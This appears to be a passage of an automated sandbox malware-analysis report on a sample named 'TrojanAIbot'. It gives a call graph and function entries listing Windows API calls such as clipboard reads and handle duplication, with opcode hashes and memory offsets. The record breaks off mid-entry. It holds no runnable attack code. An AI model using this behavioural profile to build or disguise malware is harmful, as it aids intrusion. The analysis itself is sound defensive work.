                                                                                                                execution_graph 29137 549e108 29138 549e119 29137->29138 29141 549e183 29138->29141 29142 549daac 29138->29142 29143 549dab7 29142->29143 29144 549e17c 29143->29144 29147 549f898 29143->29147 29153 549f8a8 29143->29153 29159 549e41c 29147->29159 29150 549f8cf 29150->29144 29151 549f8f6 CreateIconFromResourceEx 29152 549f976 29151->29152 29152->29144 29154 549e41c CreateIconFromResourceEx 29153->29154 29155 549f8bf 29154->29155 29156 549f8cf 29155->29156 29157 549f8f6 CreateIconFromResourceEx 29155->29157 29156->29144 29158 549f976 29157->29158 29158->29144 29160 549f8f8 CreateIconFromResourceEx 29159->29160 29161 549f8bf 29160->29161 29161->29150 29161->29151 29162 5499108 29165 5498cd8 29162->29165 29164 549911f 29166 5498ce3 29165->29166 29167 54991d8 29166->29167 29171 54991e9 29166->29171 29176 54991f8 29166->29176 29167->29164 29168 54991a2 29168->29164 29173 54991f6 29171->29173 29174 549943d 29173->29174 29181 5499659 29173->29181 29174->29168 29178 54991fe 29176->29178 29177 5499473 29177->29168 29179 549943d 29178->29179 29180 5499659 4 API calls 29178->29180 29179->29168 29180->29177 29182 5499697 29181->29182 29183 549971e 29182->29183 29185 5496890 29182->29185 29186 54968a0 29185->29186 29187 54968dd 29186->29187 29190 549add9 29186->29190 29210 549ade8 29186->29210 29187->29183 29191 549ade6 29190->29191 29192 549af1b 29191->29192 29196 549aebf 29191->29196 29193 5492208 4 API calls 29192->29193 29201 549aef0 29192->29201 29193->29201 29195 549af2b 29239 5498f04 29195->29239 29230 5492208 29196->29230 29198 549af35 29253 5498e88 29198->29253 29235 5498ef4 29201->29235 29202 549af3d 29203 549b047 29202->29203 29204 5496890 4 API calls 29202->29204 29257 549a8c0 29203->29257 29261 549a8d0 29203->29261 29206 549afed 29204->29206 29205 549b0bc 29206->29203 29265 5498f64 29206->29265 29211 549adeb 29210->29211 29212 549af1b 29211->29212 29216 549aebf 29211->29216 29213 5492208 4 API calls 29212->29213 29221 549aef0 29212->29221 29213->29221 29214 5498ef4 4 API calls 29215 549af2b 29214->29215 29217 5498f04 4 API calls 29215->29217 29220 5492208 4 API calls 29216->29220 29218 549af35 29217->29218 29219 5498e88 4 API calls 29218->29219 29222 549af3d 29219->29222 29220->29221 29221->29214 29223 549b047 29222->29223 29224 5496890 4 API calls 29222->29224 29228 549a8c0 4 API calls 29223->29228 29229 549a8d0 4 API calls 29223->29229 29226 549afed 29224->29226 29225 549b0bc 29226->29223 29227 5498f64 4 API calls 29226->29227 29227->29223 29228->29225 29229->29225 29232 5492347 29230->29232 29233 5492239 29230->29233 29231 5492245 29231->29201 29232->29232 29233->29231 29272 54919f0 CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 29233->29272 29237 5498eff 29235->29237 29236 549d9f0 29236->29195 29237->29236 29238 5496890 4 API calls 29237->29238 29238->29236 29244 5498f0f 29239->29244 29240 549dfa8 29240->29198 29241 549df21 29242 549df5a 29241->29242 29246 5498f64 4 API calls 29241->29246 29243 5498f64 4 API calls 29242->29243 29248 549df66 29243->29248 29244->29240 29244->29241 29245 549df74 29244->29245 29279 549ba14 CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 29244->29279 29245->29240 29252 5496890 4 API calls 29245->29252 29247 549df4c 29246->29247 29273 549da44 29247->29273 29250 549da44 4 API calls 29248->29250 29250->29245 29252->29240 29254 5498e93 29253->29254 29255 5496890 4 API calls 29254->29255 29256 549a914 29254->29256 29255->29256 29256->29202 29258 549a8dd 29257->29258 29259 5498e88 4 API calls 29258->29259 29260 549a8e4 29259->29260 29260->29205 29262 549a8dd 29261->29262 29263 5498e88 4 API calls 29262->29263 29264 549a8e4 29263->29264 29264->29205 29267 5498f6f 29265->29267 29266 549fbee 29266->29203 29267->29266 29268 5496890 4 API calls 29267->29268 29269 549fc48 29268->29269 29270 549e460 SendMessageW 29269->29270 29271 549fc59 29270->29271 29271->29203 29272->29232 29274 549da4f 29273->29274 29275 549fc48 29274->29275 29276 5496890 4 API calls 29274->29276 29280 549e460 29275->29280 29276->29275 29279->29241 29281 549fc70 SendMessageW 29280->29281 29282 549fc59 29281->29282 29282->29242 29467 5496718 29468 5496728 29467->29468 29472 549d478 29468->29472 29478 549d46a 29468->29478 29469 5496751 29473 549d4ad 29472->29473 29484 5497d60 29473->29484 29475 549d502 29496 549b930 29475->29496 29477 549d509 29477->29469 29479 549d478 29478->29479 29480 5497d60 4 API calls 29479->29480 29481 549d502 29480->29481 29482 549b930 4 API calls 29481->29482 29483 549d509 29482->29483 29483->29469 29488 5497d8c 29484->29488 29486 5496890 4 API calls 29487 549816c 29486->29487 29487->29475 29494 5497fc4 29488->29494 29506 549798c 29488->29506 29489 5497e45 29490 5496890 4 API calls 29489->29490 29495 5497eed 29489->29495 29491 5497eb7 29490->29491 29492 5496890 4 API calls 29491->29492 29492->29495 29493 5496890 4 API calls 29493->29494 29494->29486 29494->29487 29495->29493 29497 549b93b 29496->29497 29498 549d72f 29497->29498 29499 549d767 29497->29499 29505 549d736 29497->29505 29500 5496890 4 API calls 29498->29500 29501 549d7b8 29499->29501 29502 549d78c 29499->29502 29500->29505 29504 5496890 4 API calls 29501->29504 29503 5496890 4 API calls 29502->29503 29503->29505 29504->29505 29505->29477 29509 5497997 29506->29509 29507 5498307 29507->29489 29508 5496890 4 API calls 29510 54982c9 29508->29510 29509->29507 29509->29510 29511 5496890 4 API calls 29509->29511 29510->29507 29510->29508 29511->29510 29512 549d528 29513 549d56a 29512->29513 29514 549d570 SetWindowTextW 29512->29514 29513->29514 29515 549d5a1 29514->29515 29283 f2d330 29286 f2d418 29283->29286 29284 f2d33f 29287 f2d45c 29286->29287 29289 f2d439 29286->29289 29287->29284 29288 f2d660 GetModuleHandleW 29290 f2d68d 29288->29290 29289->29287 29289->29288 29290->29284 29516 f2f6c0 29517 f2f706 29516->29517 29521 f2fc98 29517->29521 29524 f2fca8 29517->29524 29518 f2f7f3 29522 f2fcd6 29521->29522 29527 f2e1a0 29521->29527 29522->29518 29525 f2e1a0 DuplicateHandle 29524->29525 29526 f2fcd6 29525->29526 29526->29518 29528 f2fd10 DuplicateHandle 29527->29528 29529 f2fda6 29528->29529 29529->29522 29291 549800c 29292 5498015 29291->29292 29294 5498033 29291->29294 29293 5496890 4 API calls 29292->29293 29292->29294 29293->29294 29295 5496890 4 API calls 29294->29295 29296 549816c 29294->29296 29295->29296 29297 5496581 29300 5491c94 29297->29300 29299 549659a 29301 5491c9f 29300->29301 29302 549664a CallWindowProcW 29301->29302 29303 54965f9 29301->29303 29302->29303 29303->29299 29304 549ba40 29305 549ba73 29304->29305 29312 549bd40 29305->29312 29321 549bd50 29305->29321 29306 549bad8 29307 549bafe 29306->29307 29329 5ea4198 29306->29329 29335 5ea4189 29306->29335 29313 549bd2f 29312->29313 29314 549bd4b 29312->29314 29313->29306 29315 549bf9a 29314->29315 29317 549bd7c 29314->29317 29342 549b710 29315->29342 29318 549beb6 29317->29318 29346 549c340 29317->29346 29351 549c2df 29317->29351 29318->29306 29322 549bd69 29321->29322 29325 549bd7c 29321->29325 29323 549bf9a 29322->29323 29322->29325 29324 549b710 CallWindowProcW 29323->29324 29326 549beb6 29324->29326 29325->29326 29327 549c2df CallWindowProcW 29325->29327 29328 549c340 CallWindowProcW 29325->29328 29326->29306 29327->29326 29328->29326 29330 5ea41a0 29329->29330 29331 5ea41b3 29330->29331 29379 5ea45e0 29330->29379 29390 5ea45d1 29330->29390 29331->29307 29332 5ea41c9 29332->29307 29336 5ea414b 29335->29336 29338 5ea4192 29335->29338 29336->29307 29337 5ea41b3 29337->29307 29338->29337 29340 5ea45e0 OleGetClipboard 29338->29340 29341 5ea45d1 OleGetClipboard 29338->29341 29339 5ea41c9 29339->29307 29340->29339 29341->29339 29343 549b71b 29342->29343 29344 549c340 CallWindowProcW 29343->29344 29345 549c556 29343->29345 29344->29345 29345->29318 29347 549c34b 29346->29347 29348 549c352 29346->29348 29347->29318 29350 549c2df CallWindowProcW 29348->29350 29349 549c358 29349->29318 29350->29349 29352 549c2ea 29351->29352 29353 549c35f 29351->29353 29352->29318 29354 549c363 29353->29354 29355 549c347 29353->29355 29356 549c34b 29354->29356 29357 549c37e 29354->29357 29358 549c3a0 29354->29358 29355->29356 29365 549c2df CallWindowProcW 29355->29365 29356->29318 29362 549c38c 29357->29362 29366 5495980 29357->29366 29360 5495980 CallWindowProcW 29358->29360 29359 549c358 29359->29318 29364 549c3a7 29360->29364 29362->29318 29363 549c3c8 29363->29318 29364->29318 29365->29359 29368 54959cc 29366->29368 29367 5495a1d 29367->29363 29368->29367 29371 549c3d0 29368->29371 29375 549c3e0 29368->29375 29372 549c426 29371->29372 29373 5491c94 CallWindowProcW 29372->29373 29374 549c449 29372->29374 29373->29374 29374->29367 29376 549c426 29375->29376 29377 5491c94 CallWindowProcW 29376->29377 29378 549c449 29376->29378 29377->29378 29378->29367 29380 5ea45f2 29379->29380 29381 5ea460d 29380->29381 29383 5ea4639 29380->29383 29388 5ea45e0 OleGetClipboard 29381->29388 29389 5ea45d1 OleGetClipboard 29381->29389 29382 5ea4613 29382->29332 29385 5ea46b9 29383->29385 29401 5ea47a0 29383->29401 29405 5ea4791 29383->29405 29384 5ea46d7 29384->29332 29385->29332 29388->29382 29389->29382 29391 5ea45f2 29390->29391 29392 5ea460d 29391->29392 29394 5ea4639 29391->29394 29399 5ea45e0 OleGetClipboard 29392->29399 29400 5ea45d1 OleGetClipboard 29392->29400 29393 5ea4613 29393->29332 29396 5ea46b9 29394->29396 29397 5ea47a0 OleGetClipboard 29394->29397 29398 5ea4791 OleGetClipboard 29394->29398 29395 5ea46d7 29395->29332 29396->29332 29397->29395 29398->29395 29399->29393 29400->29393 29403 5ea47b5 29401->29403 29404 5ea47db 29403->29404 29409 5ea24cc 29403->29409 29404->29384 29407 5ea47b5 29405->29407 29406 5ea24cc OleGetClipboard 29406->29407 29407->29406 29408 5ea47db 29407->29408 29408->29384 29410 5ea4848 OleGetClipboard 29409->29410 29412 5ea48e2 29410->29412 29413 f25238 29414 f2524f 29413->29414 29420 f24e0c 29414->29420 29416 f252be 29424 5ea1660 29416->29424 29428 5ea16b8 29416->29428 29421 f24e17 29420->29421 29423 5496890 4 API calls 29421->29423 29422 f27abe 29422->29416 29423->29422 29425 5ea1665 29424->29425 29432 5ea12f4 29425->29432 29429 5ea16c7 29428->29429 29430 5ea12f4 2 API calls 29429->29430 29431 f252c5 29430->29431 29434 5ea12ff 29432->29434 29436 5ea1334 29434->29436 29435 5ea17ad 29435->29435 29438 5ea133f 29436->29438 29437 5ea1a53 29437->29435 29438->29437 29439 5ea1a28 29438->29439 29441 5ea15a8 OleInitialize 29438->29441 29439->29437 29445 5ea15a8 29439->29445 29441->29439 29442 5ea1a40 29449 5ea3350 29442->29449 29453 5ea3360 29442->29453 29446 5ea15b3 29445->29446 29448 5ea2df9 29446->29448 29457 5ea2194 29446->29457 29448->29442 29450 5ea33c5 29449->29450 29452 5ea3412 29450->29452 29464 5ea225c 29450->29464 29452->29437 29454 5ea33c5 29453->29454 29455 5ea225c DispatchMessageW 29454->29455 29456 5ea3412 29454->29456 29455->29454 29456->29437 29458 5ea219f 29457->29458 29459 5ea3113 29458->29459 29461 5ea21b0 29458->29461 29459->29448 29462 5ea3148 OleInitialize 29461->29462 29463 5ea31ac 29462->29463 29463->29459 29465 5ea40c8 DispatchMessageW 29464->29465 29466 5ea4134 29465->29466 29466->29450

                                                                                                                Executed Functions

                                                                                                                Function 00F2D418 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 38 f2d418-f2d437 39 f2d463-f2d467 38->39 40 f2d439-f2d446 call f2c720 38->40 41 f2d47b-f2d4bc 39->41 42 f2d469-f2d473 39->42 47 f2d448 40->47 48 f2d45c 40->48 49 f2d4c9-f2d4d7 41->49 50 f2d4be-f2d4c6 41->50 42->41 93 f2d44e call f2d6c0 47->93 94 f2d44e call f2d6b0 47->94 48->39 52 f2d4fb-f2d4fd 49->52 53 f2d4d9-f2d4de 49->53 50->49 51 f2d454-f2d456 51->48 54 f2d598-f2d658 51->54 55 f2d500-f2d507 52->55 56 f2d4e0-f2d4e7 call f2c72c 53->56 57 f2d4e9 53->57 88 f2d660-f2d68b GetModuleHandleW 54->88 89 f2d65a-f2d65d 54->89 59 f2d514-f2d51b 55->59 60 f2d509-f2d511 55->60 58 f2d4eb-f2d4f9 56->58 57->58 58->55 63 f2d528-f2d531 call f2c73c 59->63 64 f2d51d-f2d525 59->64 60->59 69 f2d533-f2d53b 63->69 70 f2d53e-f2d543 63->70 64->63 69->70 71 f2d561-f2d56e 70->71 72 f2d545-f2d54c 70->72 79 f2d570-f2d58e 71->79 80 f2d591-f2d597 71->80 72->71 74 f2d54e-f2d55e call f2c74c call f2c75c 72->74 74->71 79->80 90 f2d694-f2d6a8 88->90 91 f2d68d-f2d693 88->91 89->88 91->90 93->51 94->51
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 2872890c2cf439c9f0141618dabb7eae6de178c04b6f3350449bbe3d8aa1d661
                                                                                                                • Instruction ID: 006dc1b61ec8364ed12014e75eaf249dcfb284def0f76a698b4bb3d2a6dbd75c
                                                                                                                • Opcode Fuzzy Hash: 2872890c2cf439c9f0141618dabb7eae6de178c04b6f3350449bbe3d8aa1d661
                                                                                                                • Instruction Fuzzy Hash: 89815670A00B158FDB24DF29E45579ABBF1FF88314F148A2ED48AD7A40D774E845CBA0
                                                                                                                Function 05491C94 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 95 5491c94-54965ec 98 549669c-54966bc call 5491b6c 95->98 99 54965f2-54965f7 95->99 107 54966bf-54966cc 98->107 100 54965f9-5496630 99->100 101 549664a-5496682 CallWindowProcW 99->101 109 5496639-5496648 100->109 110 5496632-5496638 100->110 103 549668b-549669a 101->103 104 5496684-549668a 101->104 103->107 104->103 109->107 110->109
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05496671
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: f83bf6e7b88a257a3d74a447095868a622d9f45dcb493cc92f69765f431ccec0
                                                                                                                • Instruction ID: 43635233704a245e61aed76ec617763d091e97fc7d0af5c981e57461ecdec1e3
                                                                                                                • Opcode Fuzzy Hash: f83bf6e7b88a257a3d74a447095868a622d9f45dcb493cc92f69765f431ccec0
                                                                                                                • Instruction Fuzzy Hash: A84136B8900349DFDB14CF99C489BAABFF5FB88314F258499D519AB321D734A841CFA0
                                                                                                                Function 0549F8A8 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 112 549f8a8-549f8bd call 549e41c 114 549f8bf-549f8cd 112->114 116 549f8cf-549f8df call 549f368 114->116 117 549f8e2-549f8f4 114->117 117->114 121 549f8f6-549f974 CreateIconFromResourceEx 117->121 122 549f97d-549f99a 121->122 123 549f976-549f97c 121->123 123->122
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromIconResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668623891-0
                                                                                                                • Opcode ID: c3fd1c46ec06ab1faab061a67f305561df31492aecd8d86d8ecb277a7af8d5b1
                                                                                                                • Instruction ID: 9c64673ffcd741057c4bac63019c70c04bbe0af0dd8de229230b1906dd4af899
                                                                                                                • Opcode Fuzzy Hash: c3fd1c46ec06ab1faab061a67f305561df31492aecd8d86d8ecb277a7af8d5b1
                                                                                                                • Instruction Fuzzy Hash: DC318772904359AFCF16DFA9C845AEEBFF8EF09310F14805AE554E7261C3399864DBA0
                                                                                                                Function 05EA24CC Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 126 5ea24cc-5ea48e0 OleGetClipboard 129 5ea48e9-5ea48fa 126->129 130 5ea48e2-5ea48e8 126->130 132 5ea4904-5ea4937 129->132 130->129 135 5ea4939-5ea493d 132->135 136 5ea4947 132->136 135->136 137 5ea493f 135->137 138 5ea4948 136->138 137->136 138->138
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: d26ba83c78197d0f382b8d3557c1e9e2d1d22e854868ed1f33ff62b4be36ee99
                                                                                                                • Instruction ID: 2bf2a39e73f51e431c1239b2e13ee26daa25cf02c066ceb15e697f6f5cc1351a
                                                                                                                • Opcode Fuzzy Hash: d26ba83c78197d0f382b8d3557c1e9e2d1d22e854868ed1f33ff62b4be36ee99
                                                                                                                • Instruction Fuzzy Hash: D03122B190124DDFEB10CFA9C884BDEBBF5BF48704F208059E445BB290DBB4A845CB51
                                                                                                                Function 05EA483C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 139 5ea483c-5ea4898 140 5ea48a2-5ea48e0 OleGetClipboard 139->140 141 5ea48e9-5ea48fa 140->141 142 5ea48e2-5ea48e8 140->142 144 5ea4904-5ea4937 141->144 142->141 147 5ea4939-5ea493d 144->147 148 5ea4947 144->148 147->148 149 5ea493f 147->149 150 5ea4948 148->150 149->148 150->150
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4596696222.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5ea0000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: a799ed03a26b02e5ea1b5e4533d3402c877f4495f9c3163d80fbde0a85b7ee78
                                                                                                                • Instruction ID: b0ad10644d739c3318c7381f9bb177d1c1d4c0d60c2919c61b09ea93b53d7ab4
                                                                                                                • Opcode Fuzzy Hash: a799ed03a26b02e5ea1b5e4533d3402c877f4495f9c3163d80fbde0a85b7ee78
                                                                                                                • Instruction Fuzzy Hash: 0B310FB190124DDFEB10CFA9C584BDDBBF5BB48718F208059E044AB290D7B8A845CF55
                                                                                                                Function 00F2E1A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 151 f2e1a0-f2fda4 DuplicateHandle 153 f2fda6-f2fdac 151->153 154 f2fdad-f2fdca 151->154 153->154
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F2FCD6,?,?,?,?,?), ref: 00F2FD97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: d40da83a2c9e81207e5407d91cf7f7d27ac08530340d02157614902a44ede151
                                                                                                                • Instruction ID: be49afba43110a52e3561f91761728c932424527a9ac2d4dd096fd1f6c58c7dd
                                                                                                                • Opcode Fuzzy Hash: d40da83a2c9e81207e5407d91cf7f7d27ac08530340d02157614902a44ede151
                                                                                                                • Instruction Fuzzy Hash: 502105B5900219DFDB10CF9AD484ADEBBF4EB48314F14842AE914A7350C378A954DFA5
                                                                                                                Function 00F2FD09 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 157 f2fd09-f2fda4 DuplicateHandle 158 f2fda6-f2fdac 157->158 159 f2fdad-f2fdca 157->159 158->159
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F2FCD6,?,?,?,?,?), ref: 00F2FD97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 2a31b2132eca89366664b31f8cf8a1653cdc7e7c5a4c79646c1da7ce471f548b
                                                                                                                • Instruction ID: 3a1228ebcf7899c0251e9f957faee259f826155f5959fa6cf6bb5322851081fe
                                                                                                                • Opcode Fuzzy Hash: 2a31b2132eca89366664b31f8cf8a1653cdc7e7c5a4c79646c1da7ce471f548b
                                                                                                                • Instruction Fuzzy Hash: 882132B5C01209DFDB00CFA9D980ADEBBF4FB08320F14842AE918A3350C338A944CF60
                                                                                                                Function 0549E41C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 162 549e41c-549f974 CreateIconFromResourceEx 164 549f97d-549f99a 162->164 165 549f976-549f97c 162->165 165->164
                                                                                                                APIs
                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0549F8C2,?,?,?,?,?), ref: 0549F967
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromIconResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668623891-0
                                                                                                                • Opcode ID: 37d9746a025a88739aef9063efcb29f20ce3136cb3e958da18282c5c0e668b00
                                                                                                                • Instruction ID: d3e4b69d3549e90156fa5f38b2f06bb4a5d1a3e9b740ac3996bb7fd6d2758fd6
                                                                                                                • Opcode Fuzzy Hash: 37d9746a025a88739aef9063efcb29f20ce3136cb3e958da18282c5c0e668b00
                                                                                                                • Instruction Fuzzy Hash: 181156B180034AEFDB10DFAAC944BDEBFF8EB48320F14801AE514A7250C379A954CFA4
                                                                                                                Function 0549D522 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 168 549d522-549d568 169 549d56a-549d56d 168->169 170 549d570-549d59f SetWindowTextW 168->170 169->170 171 549d5a8-549d5c9 170->171 172 549d5a1-549d5a7 170->172 172->171
                                                                                                                APIs
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0549D592
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 530164218-0
                                                                                                                • Opcode ID: c4bbcbeb4965982a01a2c7a1e8774cd60206e7d9904c96481ec575cca2eb07ca
                                                                                                                • Instruction ID: 3e68266f2829d2b658988e56f515143804cf8de5fd17e11d54073198cf00229d
                                                                                                                • Opcode Fuzzy Hash: c4bbcbeb4965982a01a2c7a1e8774cd60206e7d9904c96481ec575cca2eb07ca
                                                                                                                • Instruction Fuzzy Hash: ED1144B2C0024A8FDB14CF9AC444BDFFBF5AF88324F10806AD458A7250D338A545CF61
                                                                                                                Function 0549D528 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 174 549d528-549d568 175 549d56a-549d56d 174->175 176 549d570-549d59f SetWindowTextW 174->176 175->176 177 549d5a8-549d5c9 176->177 178 549d5a1-549d5a7 176->178 178->177
                                                                                                                APIs
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0549D592
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_5490000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 530164218-0
                                                                                                                • Opcode ID: 12d625c8935966d9f44cf156ac1baf6ea6b25fd619c3e8d6456ab157d395ce6b
                                                                                                                • Instruction ID: f9710ea92dbaa06b82610af7d2dec646b2f82c982fc70a30bccce87872765132
                                                                                                                • Opcode Fuzzy Hash: 12d625c8935966d9f44cf156ac1baf6ea6b25fd619c3e8d6456ab157d395ce6b
                                                                                                                • Instruction Fuzzy Hash: 231112B6C002498FDB14CF9AC444BDEFBF4EB88324F10842AD859A7250D338A945CFA5
                                                                                                                Function 00F2D618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 180 f2d618-f2d658 181 f2d660-f2d68b GetModuleHandleW 180->181 182 f2d65a-f2d65d 180->182 183 f2d694-f2d6a8 181->183 184 f2d68d-f2d693 181->184 182->181 184->183
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F2D67E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4588943746.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_f20000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 7115f489be1dd5416f0dcc4c64ada354cc6c129f61a3262a3a016af5104e7ec2
                                                                                                                • Instruction ID: a59d581b1167f2a3652a4984baa10d0a2ba8ef295ab09a642a530a28bc1896c1
                                                                                                                • Opcode Fuzzy Hash: 7115f489be1dd5416f0dcc4c64ada354cc6c129f61a3262a3a016af5104e7ec2
                                                                                                                • Instruction Fuzzy Hash: EF1110B5C003498FDB10CF9AD444ADEFBF4EB88324F20842AD418A7210C379A545CFA5
                                                                                                                Function 0549E460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 186 549e460-549fcda SendMessageW 188 549fcdc-549fce2 186->188 189 549fce3-549fcf7 186->189 188->189
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0549FCCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.4595965059.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
